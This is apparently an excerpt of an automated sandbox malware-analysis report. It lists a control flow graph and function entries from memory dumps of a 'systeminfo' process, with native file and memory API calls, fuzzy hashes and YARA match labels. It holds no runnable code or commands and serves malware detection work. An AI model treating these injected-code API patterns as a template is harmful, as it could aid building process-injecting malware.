                                                                                                                                                                                control_flow_graph 219 559e20-559fdd 220 559fe4-559fe8 219->220 221 55a017 220->221 222 559fea-55a015 220->222 223 55a01e-55a02e 221->223 222->220 223->223 224 55a030-55a040 223->224 224->224 225 55a042-55a050 224->225 226 55a05b-55a064 225->226 227 55a066-55a070 226->227 228 55a072-55a07d 226->228 227->226 230 55a088-55a091 228->230 231 55a093-55a09d 230->231 232 55a09f-55a0a5 230->232 231->230 234 55a238-55a23f 232->234 235 55a0ab-55a0b2 232->235 236 55a24a-55a250 234->236 237 55a0bd-55a0c3 235->237 240 55a252-55a25c 236->240 241 55a25e-55a265 236->241 238 55a0c5-55a0d7 237->238 239 55a0d9-55a0e0 237->239 238->237 245 55a101-55a111 239->245 246 55a0e2-55a0ff 239->246 240->236 242 55a267 call 57afd0 241->242 243 55a2d8-55a2e8 241->243 251 55a26c-55a285 242->251 243->243 250 55a2ea-55a2f4 243->250 245->245 249 55a113-55a11a 245->249 246->239 252 55a135-55a13c 249->252 253 55a11c-55a133 249->253 251->251 254 55a287-55a28b 251->254 255 55a147-55a14d 252->255 253->249 256 55a2a6-55a2aa 254->256 257 55a28d-55a2a4 254->257 258 55a161-55a176 255->258 259 55a14f-55a15f 255->259 256->243 260 55a2ac-55a2d6 256->260 257->254 262 55a1a9-55a1b0 258->262 263 55a178-55a17f 258->263 259->255 260->256 264 55a1bb-55a1c1 262->264 265 55a1a4 263->265 266 55a181-55a197 263->266 267 55a1d1-55a1e2 264->267 268 55a1c3-55a1cf 264->268 265->234 269 55a1a2 266->269 270 55a199-55a19f 266->270 272 55a1ed-55a1f3 267->272 268->264 269->263 270->269 273 55a1f5-55a204 272->273 274 55a206-55a20a 272->274 273->272 276 55a233 274->276 277 55a20c-55a231 274->277 276->232 277->274
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 9$z$#'$'l$'y$GK$NW$~H$4$w
                                                                                                                                                                                • API String ID: 0-783608958
                                                                                                                                                                                • Opcode ID: d5d30b173a49d141839cfefe32fcb7956afdf7be81d290523b2858bd30e4f758
                                                                                                                                                                                • Instruction ID: 7eb035da9858f937dd661048e74af006991eda2d2bd90c54e965e6d481068aa8
                                                                                                                                                                                • Opcode Fuzzy Hash: d5d30b173a49d141839cfefe32fcb7956afdf7be81d290523b2858bd30e4f758
                                                                                                                                                                                • Instruction Fuzzy Hash: F3E1E4B0D05269CFEB24CF98C8A879DBBB1FF44309F10829AD4097B295C7B95989DF41
                                                                                                                                                                                Function 0056C500 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 0056C5E4
                                                                                                                                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 0056C61F
                                                                                                                                                                                • FindClose.KERNELBASE(?), ref: 0056C62A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3541575487-0
                                                                                                                                                                                • Opcode ID: 347c652754719286c6943b3f92082ae1d2389480664ea2fdab00ad7d856c91d9
                                                                                                                                                                                • Instruction ID: ecb505fc0d8c6ebfa0548872a4b5efaaa65673e8675f0fadb0f3a72ea2c51b6b
                                                                                                                                                                                • Opcode Fuzzy Hash: 347c652754719286c6943b3f92082ae1d2389480664ea2fdab00ad7d856c91d9
                                                                                                                                                                                • Instruction Fuzzy Hash: A431A3B1A00309BBDB20DF64CC89FFB7B7CBF84705F144458B949A7181DA70AA848BA4
                                                                                                                                                                                Function 00578FE0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtCreateFile.NTDLL(0000006F,2A4B6D90,?,?,?,?,?,?,?,?,?), ref: 005790D8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                • Opcode ID: bb34955bba97853b7765a6d160fe001ce9d91580284fbb0d601ae2af88a1f003
                                                                                                                                                                                • Instruction ID: f70907193bd000615f24d6ff95da430484b1aa3c505c8d6da945eab7e7f21dbd
                                                                                                                                                                                • Opcode Fuzzy Hash: bb34955bba97853b7765a6d160fe001ce9d91580284fbb0d601ae2af88a1f003
                                                                                                                                                                                • Instruction Fuzzy Hash: CF31D7B5A10209AFDB14DF99D885EEEBBB9FF8C310F108509F918A7340D730A811CBA5
                                                                                                                                                                                Function 00579140 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtReadFile.NTDLL(0000006F,2A4B6D90,?,?,?,?,?,?,?), ref: 00579220
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                • Opcode ID: 90cccae70db432994000959dfd1fceacd80a30804f5c4610f5b406654ed4dfdd
                                                                                                                                                                                • Instruction ID: 289aa91bd6672f8116f3c17210a89c37c658d5d5803167c5adbd51132104d06d
                                                                                                                                                                                • Opcode Fuzzy Hash: 90cccae70db432994000959dfd1fceacd80a30804f5c4610f5b406654ed4dfdd
                                                                                                                                                                                • Instruction Fuzzy Hash: 7031EA75A00609AFDB14DF98D881EEEBBB9FF88310F108619FD18A7340D770A911CBA5
                                                                                                                                                                                Function 00579440 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL(00561D1E,2A4B6D90,00577F1E,00000000,00000004,00003000,?,?,?,?,?,00577F1E,00561D1E,00577F1E,758B56EC,00561D1E), ref: 00579505
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                                                                • Opcode ID: 51428141bc61c25ce69973498f3e53e5da001e7ac444ae6020fce22643847750
                                                                                                                                                                                • Instruction ID: a3c6ee32a011ce6d043708dda72e254a50ce57df0b2ee638477813e0cc71fbb9
                                                                                                                                                                                • Opcode Fuzzy Hash: 51428141bc61c25ce69973498f3e53e5da001e7ac444ae6020fce22643847750
                                                                                                                                                                                • Instruction Fuzzy Hash: 192119B5A10209AFDB14DF98DC45FAFBBB9FF88710F008509FD18A7241D770A9118BA5
                                                                                                                                                                                Function 00579230 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtDeleteFile.NTDLL(0000006F), ref: 005792C3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DeleteFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                                                                • Opcode ID: bbe50b243a5cf900cf766d7c061a869510e8dda4bbc257fabbaa2cebaee8741e
                                                                                                                                                                                • Instruction ID: 6780aad3fd5114c375a773d94c358d62de8b87e053d449bad6c6bb97062316a7
                                                                                                                                                                                • Opcode Fuzzy Hash: bbe50b243a5cf900cf766d7c061a869510e8dda4bbc257fabbaa2cebaee8741e
                                                                                                                                                                                • Instruction Fuzzy Hash: 53117371A506097FDA10EB54DC46FEF7B6CEFC5710F008509F918A7241E771B5058BA6
                                                                                                                                                                                Function 005792D0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00579307
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Close
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                                                                • Opcode ID: 92e54b4cd05bfc7cbc6d71ba954d9647256663cf06b5149f3237a1ae9698a208
                                                                                                                                                                                • Instruction ID: dc67ba3a805c7848889ed85ea287cdc5d1d2061bb1699bf524cb68af8f9e09b4
                                                                                                                                                                                • Opcode Fuzzy Hash: 92e54b4cd05bfc7cbc6d71ba954d9647256663cf06b5149f3237a1ae9698a208
                                                                                                                                                                                • Instruction Fuzzy Hash: B1E046362406057BCA60AA59EC01FABBBACEBC5764F508419FA0CA7242DA71B90587A5
                                                                                                                                                                                Function 047A4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 24ab62615a1443b4cb36e66193fdb81d2202be8cb85dc3db7b1c2e393a83ea4d
                                                                                                                                                                                • Instruction ID: 8b55cf99da5ba1dbfb0cafde46006e713c04560e47e47213cfb73d6a1bb50622
                                                                                                                                                                                • Opcode Fuzzy Hash: 24ab62615a1443b4cb36e66193fdb81d2202be8cb85dc3db7b1c2e393a83ea4d
                                                                                                                                                                                • Instruction Fuzzy Hash: 1A90026160150042615071584C0454660099BE1305396C125A0956570C8618D95596AA
                                                                                                                                                                                Function 047A4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: f6728104a28f36cf203703fa068fb030b9de0c5d33da00b64d6df79330e422a0
                                                                                                                                                                                • Instruction ID: a149682a5648bd73435e89a6a014a66c2546bf58f8cd7851789069a9b59103f6
                                                                                                                                                                                • Opcode Fuzzy Hash: f6728104a28f36cf203703fa068fb030b9de0c5d33da00b64d6df79330e422a0
                                                                                                                                                                                • Instruction Fuzzy Hash: AE90023160580012B15071584C8468640099BE0305B56C021E0826574C8A14DA5657A2
                                                                                                                                                                                Function 047A2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: a7d1f14307f24ef236058da6d90ed766b5bc49b9ba2e6d454a9a94eb53fa95da
                                                                                                                                                                                • Instruction ID: 89683d07aac0e0471fb910173e36ccb62407e65f69b27c8866db937396a1ebf9
                                                                                                                                                                                • Opcode Fuzzy Hash: a7d1f14307f24ef236058da6d90ed766b5bc49b9ba2e6d454a9a94eb53fa95da
                                                                                                                                                                                • Instruction Fuzzy Hash: 9C90023120148802F1207158880478A00098BD0305F5AC421A4826678D8695D9917562
                                                                                                                                                                                Function 047A2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 415fd4acc4e0d77ec0d83ca8214dde71d3835bb8998003e9aab3dbfbc64101dc
                                                                                                                                                                                • Instruction ID: 22a9ae0c4227ce5450569ec6174f6c7a83bd71dac34acf62f648e378ea855635
                                                                                                                                                                                • Opcode Fuzzy Hash: 415fd4acc4e0d77ec0d83ca8214dde71d3835bb8998003e9aab3dbfbc64101dc
                                                                                                                                                                                • Instruction Fuzzy Hash: 6C90023120140842F11071584804B8600098BE0305F56C026A0526674D8615D9517962
                                                                                                                                                                                Function 047A2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 969618c6c5d7f9e6f2c0e4750e5ec13dc3a9163289cc6f25cede30425b675d4f
                                                                                                                                                                                • Instruction ID: 182810e6a68673b6d73319305fb671f34209ec4700a5ee7e536e103720f0faba
                                                                                                                                                                                • Opcode Fuzzy Hash: 969618c6c5d7f9e6f2c0e4750e5ec13dc3a9163289cc6f25cede30425b675d4f
                                                                                                                                                                                • Instruction Fuzzy Hash: CF90023120140402F1107598580878600098BE0305F56D021A5426575EC665D9916572
                                                                                                                                                                                Function 047A2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 20b04fb411ed3111bfa58ed434f358b99dd550739bcf732e8c23b1e10e3f6c93
                                                                                                                                                                                • Instruction ID: 5adf60f04338f3f0a391b0476c293365ac260948cc7f6f857cd5b6f096f8aff8
                                                                                                                                                                                • Opcode Fuzzy Hash: 20b04fb411ed3111bfa58ed434f358b99dd550739bcf732e8c23b1e10e3f6c93
                                                                                                                                                                                • Instruction Fuzzy Hash: 2890022130140003F150715858187464009DBE1305F56D021E0816574CD915D9565663
                                                                                                                                                                                Function 047A2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: a3a1f8bc84c2802989a7a49af91e472fdcd9ec0b1710381fea06779445678cef
                                                                                                                                                                                • Instruction ID: 0ed6480a81a77a4aac4d94ddef2425507a769687d85b49e1f03a2addb5f09bae
                                                                                                                                                                                • Opcode Fuzzy Hash: a3a1f8bc84c2802989a7a49af91e472fdcd9ec0b1710381fea06779445678cef
                                                                                                                                                                                • Instruction Fuzzy Hash: 6E90022921340002F1907158580874A00098BD1206F96D425A0417578CC915D9695762
                                                                                                                                                                                Function 047A2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: fc0d8e03588adf4ef8669ac2d0538013bbbd30ca74b99cf852be778603358e0a
                                                                                                                                                                                • Instruction ID: 28aacaa5892a3321c5e2f9c33e279211c0f5da48aa6503116129dce65d9f4d74
                                                                                                                                                                                • Opcode Fuzzy Hash: fc0d8e03588adf4ef8669ac2d0538013bbbd30ca74b99cf852be778603358e0a
                                                                                                                                                                                • Instruction Fuzzy Hash: 1090023120140413F12171584904747000D8BD0245F96C422A0826578D9656DA52A562
                                                                                                                                                                                Function 047A2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 0f41a04c9e1bd4466a465bdafe633e674827a43bed802fb1177cdee8530e6ce5
                                                                                                                                                                                • Instruction ID: aee38cc9ad1c54cb2f5bf4eed9459979fa20d937cfaa765dfe9365ab50fa9ce5
                                                                                                                                                                                • Opcode Fuzzy Hash: 0f41a04c9e1bd4466a465bdafe633e674827a43bed802fb1177cdee8530e6ce5
                                                                                                                                                                                • Instruction Fuzzy Hash: D2900221242441527555B1584804647400A9BE0245796C022A1816970C8526E956DA62
                                                                                                                                                                                Function 047A2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 5b4e3ee00402e9143d9fc76f33f3d6ffe1608e4bfea29df025f7cd6c7de38a84
                                                                                                                                                                                • Instruction ID: b28b8f06878e61bd72e942d9c158f390a51114f652bb7a4d3b5b96c261fc2f1e
                                                                                                                                                                                • Opcode Fuzzy Hash: 5b4e3ee00402e9143d9fc76f33f3d6ffe1608e4bfea29df025f7cd6c7de38a84
                                                                                                                                                                                • Instruction Fuzzy Hash: 7790026120180403F15075584C0474700098BD0306F56C021A2466575E8A29DD516576
                                                                                                                                                                                Function 047A2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 399a4458ba542cbf10aabd738e21142037f05085e762018697e6e2c5a706f7a2
                                                                                                                                                                                • Instruction ID: 2007db79cb9c7e397a255f122ac4327dbbcc7d0751d9c7b1bca543574fb20464
                                                                                                                                                                                • Opcode Fuzzy Hash: 399a4458ba542cbf10aabd738e21142037f05085e762018697e6e2c5a706f7a2
                                                                                                                                                                                • Instruction Fuzzy Hash: 0C90022160140502F11171584804756000E8BD0245F96C032A1426575ECA25DA92A572
                                                                                                                                                                                Function 047A2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 26b3e4b2ada4272a657810ab5bbe7a0b1bdfd17d5188ed50b1d5706a465e8de6
                                                                                                                                                                                • Instruction ID: b1b075d431ad61876c2ae8d5385e1052a451f27d9a41b394870e367d33bd3102
                                                                                                                                                                                • Opcode Fuzzy Hash: 26b3e4b2ada4272a657810ab5bbe7a0b1bdfd17d5188ed50b1d5706a465e8de6
